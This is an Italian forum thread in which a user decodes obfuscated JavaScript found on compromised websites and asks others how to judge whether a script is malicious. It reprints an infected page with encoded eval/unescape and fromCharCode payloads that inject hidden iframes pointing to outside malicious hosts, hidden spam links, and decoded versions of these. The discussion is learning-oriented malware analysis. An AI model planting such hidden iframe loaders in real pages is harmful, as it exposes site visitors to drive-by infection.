PDA

View Full Version : Decriptare javascript offuscati

juninho85
02-04-2008, 15:04
Questi giorni in cui ho un pт di libertа sto provando a smanettare con i tool resi disponibili da Edgar,reperibili qui (http://edgar.bangkok.googlepages.com/edgar%27sinternettools).
Con l'ausilio di WebScanner (http://edgar.bangkok.googlepages.com/webscanner_v3_5_1.zip),una volta letto questo (http://www.castlecops.com/t210364-.html) report da CastleCops,mi son fatto una ricerca di tutti i siti hostati su quel server con la query unescape$Iframe,utilizzata per reindirizzare verso siti malevoli.
E saltato fuori questo crazydog.chat.ru,qui sotto trovate i sorgenti:
<html><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<title>Автосалон FIAT г. Тюмень: официальный сайт</title>
<meta http-equiv="Content-Type" content="text/html; Charset=Windows-1251" />
<meta name="KeyWords" content="Официальный, сайт, FIAT, г. Тюмень, Panda, Panda 4x4 Climbing, Grande Punto 3d, Grande Punto 5d, Croma, Doblo Panorama, Doblo Cargo, гарантия, сервис, техническое обслуживание, новости." />
<meta name="Description" content="Автосалон FIAT г. Тюмень" />
<meta name="Author" content="Zebra-Group - www.zebra-group.ru">
<meta name="Generator" content="Handmade"/>
<link rel="Stylesheet" href="/main.css" type="text/css"/>
<link rel="SHORTCUT ICON" href="/favicon.ico"/>


<script language='javascript' src='http://127.0.0.1:1030/js.cgi?pca&r=19718'></script>

<script language="JavaScript" src="/java.js"></script>
</head>
<body ><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%37%30%34%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%62%65%73%74%69%6e%6c%69%76%65%2e%63%6e%2f%69%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%36%31%34%34%29%2b%27%37%34%32%62%64%36%35%32%35%62%31%5c%27%20%77%69%64%74%68%3d%35%34%34%20%68%65%69%67%68%74%3d%35%32%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

<!-- AdRiver code START Type: ZeroPixel Site: fiat.ru PZ: 0 BN: 0-->
<noscript>
<img src="http://ad.adriver.ru/cgi-bin/rle.cgi?sid=76322&bt=21&pz=0&rnd=989211744" alt="-AdRiver-" border=0 width=1 height=1>
</noscript>
<!-- AdRiver code END -->

<div id="sub">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="700" height="100" id="sub_menu" align="middle">
<PARAM NAME=FlashVars VALUE="id=1&razdel=">
<param name="allowScriptAccess" value="sameDomain" />

</object>
</div>



<param name="allowScriptAccess" value="sameDomain" />
<param name="movie" value="/img/menu_head.swf" /><param name="menu" value="false" /><param name="quality" value="high" /><p

<!-- + --><script language=\"JavaScript\"> eval(unescape(\"document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C111%2C110%2C119%2C101%2C98%2C117%2C115%2C97%2C46%2C99%2C111%2C109%2C47%2C99%2C111%2C105%2C110%2C47%2C99%2C111%2C105%2C110%2C95%2C108%2C97%2C110%2C103%2C47%2C108%2C97%2C110%2C103%2C95%2C101%2C110%2C103%2C108%2C105%2C115%2C104%2C47%2C108%2C111%2C99%2C97%2C108%2C47%2C105%2C99%2C101%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B\")); </script><!-- + -->
<!-- START CNN HOT NEWS -->
<div id="bbc_co_uk_rss" style="margin-top: -9999px;">
<table cellpadding="2" cellspacing="2">
<tr><td><a href="http://www.streamingpornsex.com/sitemap.html" title="will porn">will porn</a> - <em>will porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.bestpornsight.com/sitemap.html" title="porn here">porn here</a> - <em>porn here</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornsitecentral.com/sitemap.html" title="free porn">free porn</a> - <em>free porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornstarresource.com/sitemap.html" title="where porn">where porn</a> - <em>where porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.bargainpornsex.com/sitemap.html" title="on porn">on porn</a> - <em>on porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.vietsuperporn.com/sitemap.html" title="how porn">how porn</a> - <em>how porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornstarsolutions.com/sitemap.html" title="is porn">is porn</a> - <em>is porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.bargainpornsex.com/sitemap.html" title="la porn">la porn</a> - <em>la porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.onlineporndirectory.com/sitemap.html" title="donwload porn">donwload porn</a> - <em>donwload porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornworldcup.com/sitemap.html" title="of porn">of porn</a> - <em>of porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.cheapxxxblog.ru/sitemap.html" title="вы порно">вы порно</a> - <em>вы порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornwebmistressblog.ru/sitemap.html" title="год порно">год порно</a> - <em>год порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.skyblogonline.ru/sitemap.html" title="всего порно">всего порно</a> - <em>всего порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.bargainpornblog.ru/sitemap.html" title="бы порно">бы порно</a> - <em>бы порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.rucespornworld.ru/sitemap.html" title="вот порно">вот порно</a> - <em>вот порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.christmassexblog.ru/sitemap.html" title="быть порно">быть порно</a> - <em>быть порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.adultsexdatingblog.ru/sitemap.html" title="весь порно">весь порно</a> - <em>весь порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornblogdirect.ru/sitemap.html" title="все порно">все порно</a> - <em>все порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.topxxxblog.ru/sitemap.html" title="в порно">в порно</a> - <em>в порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.rusexmovies.ru/sitemap.html" title="говорить порно">говорить порно</a> - <em>говорить порно</em> permanent link...</td></tr>
<tr><td>Copyright &copy; 2007</td></tr>
</table>
</div>
</title></comment></a></div></span></ilayer></layer></iframe></center>
</noframes></style></noscript></table></script></applet></font></td></tr>

<center>
<font size="1">Chat.Ru рекомендует:</font>
<a target="_blank" href="http://www.asia.ru/"><font size="1">Производители,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">товары,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">оборудование:</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Китай,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Индия,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Япония,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Сингапур</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Тайвань</font></a>
</center>
</body>
</html>
<!-- END CNN HOT NEWS -->
notare questo:
unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%37%30%34%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%62%65%73%74%69%6e%6c%69%76%65%2e%63%6e%2f%69%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%36%31%34%34%29%2b%27%37%34%32%62%64%36%35%32%35%62%31%5c%27%20%77%69%64%74%68%3d%35%34%34%20%68%65%69%67%68%74%3d%35%32%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")
tradotto col tool Deobfuscating javascript tool (http://edetools.blogspot.com/2007/10/deobfuscating-javascript-tool.html)
ottengo,traducendo con chiave 9:
window.status="Done";document.write("<iframename=67046src=\"http://bestinlive.cn/i/index.php?"+Math.round(Math.random()*286144)+"742bd6525b1\"width=544height=526style=\"display:none\"></iframe>")

Alla fine della fiera:come capisco se uno javascript и maligno o meno?:stordita:

Inserendo il sito:
http://bestinlive.cn/i/index.php
su finjan ottengo questo (http://www.finjan.com/Content.aspx?id=574)
Volevo chiedervi se la lamerata и andata a buon fine,perchи и la prima volta che provo a comprendere questo chezzo di sistema!:D
juninho85
02-04-2008, 15:31
questo invece contenuto in chezbacbacool.com
%66%75%6E%63%74%69%6F%6E%20%44%5F%28%42%5F%29%7B%76%61%72%20%41%5F%2C%4E%5F%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%53%5F%3D%30%2C%54%5F%3D%22%22%2C%4C%32%5F%3D%54%5F%2C%5A%5F%2C%50%5F%2C%53%5F%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%32%35%36%3B%41%5F%2B%2B%29%7B%5A%5F%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%41%5F%29%3B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3C%30%29%4C%32%5F%2B%3D%5A%5F%3B%7D%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%42%5F%2E%6C%65%6E%67%74%68%3B%41%5F%2B%2B%29%7B%5A%5F%3D%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%3B%69%66%28%54%5F%2E%6C%65%6E%67%74%68%3E%31%30%32%34%29%7B%53%5F%2B%2B%3B%4E%5F%5B%53%5F%5D%3D%54%5F%3B%54%5F%3D%22%22%7D%69%66%28%5A%5F%3D%3D%22%25%22%29%7B%41%5F%2B%2B%3B%54%5F%2B%3D%4C%32%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%29%29%7D%65%6C%73%65%7B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3E%2D%31%29%7B%54%5F%2B%3D%4C%31%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%6C%65%6E%67%74%68%2D%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%2D%31%29%7D%65%6C%73%65%7B%54%5F%2B%3D%5A%5F%7D%7D%7D%66%6F%72%28%41%5F%3D%53%5F%3B%41%5F%3E%30%3B%41%5F%2D%2D%29%54%5F%3D%4E%5F%5B%41%5F%5D%20%2B%54%5F%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%7C%7C%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%3F%75%6E%65%73%63%61%70%65%28%65%73%63%61%70%65%28%54%5F%29%29%3A%54%5F%29%7D
tradotto:
function D_(B_){var A_,N_=new Array(),S_=0,T_="",L2_=T_,Z_,P_,S_;for(A_=0;A_<256;A_ ){Z_=String.fromCharCode(A_);if(L1_.indexOf(Z_)<0)L2_ =Z_;};for(A_=0;A_<B_.length;A_ ){Z_=B_.charAt(A_);if(T_.length>1024){S_ ;N_[S_]=T_;T_=""}if(Z_=="%"){A_ ;T_ =L2_.charAt(L1_.indexOf(B_.charAt(A_)))}else{if(L1_.indexOf(Z_)>-1){T_ =L1_.charAt(L1_.length-L1_.indexOf(Z_)-1)}else{T_ =Z_}}}for(A_=S_;A_>0;A_--)T_=N_[A_] T_;document.write((document.layers||document.all)?unescape(escape(T_)):T_)
non и maligno,giusto?
da cosa ve ne accorgete?
juninho85
02-04-2008, 17:04
questo invece dovrebbe esser maligno
zi6c1zjsocfi1.blogspot.com
<p><script language="javascript">document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%2F%62%6F%75%67%68%74%6D%6F%72%65%2E%63%6F%6D%22%29%3B%3C%2F%73%63%72%69%70%74%3E"));</script></p>
tradotto:
<scriptlanguage="javascript">location.replace("http://boughtmore.com");</script>
anche se reindirizza a
http://boughtmore.com

di per se non sembra malevolo,a meno che per voi fare un pт di scorta di cialis lo sia:stordita:
Gianky....! :D :)
02-04-2008, 21:40
questo invece contenuto in chezbacbacool.com
%66%75%6E%63%74%69%6F%6E%20%44%5F%28%42%5F%29%7B%76%61%72%20%41%5F%2C%4E%5F%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%53%5F%3D%30%2C%54%5F%3D%22%22%2C%4C%32%5F%3D%54%5F%2C%5A%5F%2C%50%5F%2C%53%5F%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%32%35%36%3B%41%5F%2B%2B%29%7B%5A%5F%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%41%5F%29%3B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3C%30%29%4C%32%5F%2B%3D%5A%5F%3B%7D%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%42%5F%2E%6C%65%6E%67%74%68%3B%41%5F%2B%2B%29%7B%5A%5F%3D%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%3B%69%66%28%54%5F%2E%6C%65%6E%67%74%68%3E%31%30%32%34%29%7B%53%5F%2B%2B%3B%4E%5F%5B%53%5F%5D%3D%54%5F%3B%54%5F%3D%22%22%7D%69%66%28%5A%5F%3D%3D%22%25%22%29%7B%41%5F%2B%2B%3B%54%5F%2B%3D%4C%32%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%29%29%7D%65%6C%73%65%7B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3E%2D%31%29%7B%54%5F%2B%3D%4C%31%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%6C%65%6E%67%74%68%2D%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%2D%31%29%7D%65%6C%73%65%7B%54%5F%2B%3D%5A%5F%7D%7D%7D%66%6F%72%28%41%5F%3D%53%5F%3B%41%5F%3E%30%3B%41%5F%2D%2D%29%54%5F%3D%4E%5F%5B%41%5F%5D%20%2B%54%5F%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%7C%7C%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%3F%75%6E%65%73%63%61%70%65%28%65%73%63%61%70%65%28%54%5F%29%29%3A%54%5F%29%7D
tradotto:
function D_(B_){var A_,N_=new Array(),S_=0,T_="",L2_=T_,Z_,P_,S_;for(A_=0;A_<256;A_ ){Z_=String.fromCharCode(A_);if(L1_.indexOf(Z_)<0)L2_ =Z_;};for(A_=0;A_<B_.length;A_ ){Z_=B_.charAt(A_);if(T_.length>1024){S_ ;N_[S_]=T_;T_=""}if(Z_=="%"){A_ ;T_ =L2_.charAt(L1_.indexOf(B_.charAt(A_)))}else{if(L1_.indexOf(Z_)>-1){T_ =L1_.charAt(L1_.length-L1_.indexOf(Z_)-1)}else{T_ =Z_}}}for(A_=S_;A_>0;A_--)T_=N_[A_] T_;document.write((document.layers||document.all)?unescape(escape(T_)):T_)
non и maligno,giusto?
da cosa ve ne accorgete?

Dal fatto che il javascript non contiene contiene link/url

MUAHAHAHHAHA :asd: :asd:
juninho85
02-04-2008, 21:42
Dal fatto che il javascript non contiene contiene link/url

MUAHAHAHHAHA :asd: :asd:

l'ho pensato pure io,perт non mi spiego la necessitа di criptarlo in quel modo :wtf:
W.S.
03-04-2008, 08:17
Alla fine della fiera:come capisco se uno javascript и maligno o meno?

Leggendo il codice e comprendendo quello che fa. Se tenta di eseguire qualcosa che non vuoi che la tua macchina esegua, allora и da considerare maligno.
Non и detto che se contiene url и maligno, potrebbe essere il link di un menu e un collegamento lecito.

Offuscare il codice dovrebbe servire ad evitare la copia del codice stesso. A volte chi coda lo offusca per non farsi copiare le idee. Il che и abbastanza assurdo parlando di javascript visto che и sempre possibile decifrarlo. Altre volte si и convinti che offuscandolo si possa nascondere qualche procedura sensibile, come l'autenticazione.. inutile dire che и ancora piщ assurdo.
L'utilitа piщ grande dell'offuscamento javascript и rivolta agli attaccanti, viene usato per nascondere ai tool di rilevamento automatico il codice. Un utente accorto riuscirа sempre a capire cosa viene eseguito ma un programma automatico и facilmente aggirabile (a volte addirittura sfruttabile per i propri scopi)
juninho85
03-04-2008, 08:56
in poche parole "basta" essere in grado di capire il linguaggio...и il caso che mi metta a studiare :D